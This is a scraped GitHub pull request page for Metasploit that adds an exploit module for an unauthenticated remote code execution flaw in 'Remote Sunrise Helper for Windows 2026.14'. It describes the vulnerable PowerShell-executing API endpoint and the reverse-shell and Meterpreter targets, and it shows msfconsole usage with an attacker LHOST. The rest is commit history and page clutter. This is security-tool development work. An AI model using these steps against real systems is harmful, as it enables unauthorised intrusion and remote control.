Add Remote Sunrise Helper for Windows 2026.14 unauthenticated RCE by blue0x1 · Pull Request #21336 · rapid7/metasploit-framework

blue0x1 · 2026-04-21T08:43:34Z

Summary

This adds a new exploit module for an unauthenticated remote code execution vulnerability
in Remote Sunrise Helper for Windows 2026.14.

The application exposes an HTTP API on a dynamically assigned HTTPS port. When authentication
is disabled (requires.auth: false), the /api/executeScript endpoint executes arbitrary
PowerShell passed via the X-Script request header with no credentials required.

Vulnerability Details

Software: Remote Sunrise Helper for Windows 2026.14
Disclosure Date: 2026-04-20
Original Author: Chokri Hammedi
Reference: https://packetstorm.news/files/id/219192/

Module Details

Checks /api/getVersion to confirm auth is disabled before exploiting
Target 0: PowerShell Direct reverse shell (cmd/windows/powershell_reverse_tcp)
Target 1: Windows x64 Meterpreter via PowerShell in-memory stager
Target 2: Windows x86 Meterpreter via PowerShell in-memory stager

Verification

Tested on Windows 10 (10.0.19043) and Windows 11.

msf6 > use exploit/windows/misc/remote_sunrise_helper_rce                                                                                                                                   
msf6 exploit(...) > set RHOSTS <target>                   
msf6 exploit(...) > set RPORT <port>                                                                                                                                                        
msf6 exploit(...) > set LHOST <attacker>                                                                                                                                                    
msf6 exploit(...) > check                                                                                                                                                                   
[+] The target is vulnerable. Authentication disabled - version 2026.14                                                                                                                     
msf6 exploit(...) > run

…p compliance

…ntation cop

Add Remote Sunrise Helper for Windows 2026.14 unauthenticated RCE

90f3b66

smcintyre-r7 added this to Metasploit Kanban Apr 21, 2026

github-project-automation Bot moved this to Todo in Metasploit Kanban Apr 21, 2026

katana added 5 commits April 21, 2026 10:02

Improve exploit module: fix reverse shell session handling and ruboco…

c2e7061

…p compliance

Add CVE-2026-41477: Deskflow unauthenticated IPC named pipe LPE

e5c4a97

Fix rubocop: description indentation, GHSA reference, empty? predicate

6cba68f

Fix description indentation to key_indent+2 per ModuleDescriptionInde…

14ab8ee

…ntation cop

Remove deskflow module - submitted in separate PR

08a5c13

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Add Remote Sunrise Helper for Windows 2026.14 unauthenticated RCE#21336

Add Remote Sunrise Helper for Windows 2026.14 unauthenticated RCE#21336
blue0x1 wants to merge 6 commits intorapid7:masterfrom
blue0x1:add/remote-sunrise-helper-rce

blue0x1 commented Apr 21, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Conversation

blue0x1 commented Apr 21, 2026

Summary

Vulnerability Details

Module Details

Verification

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants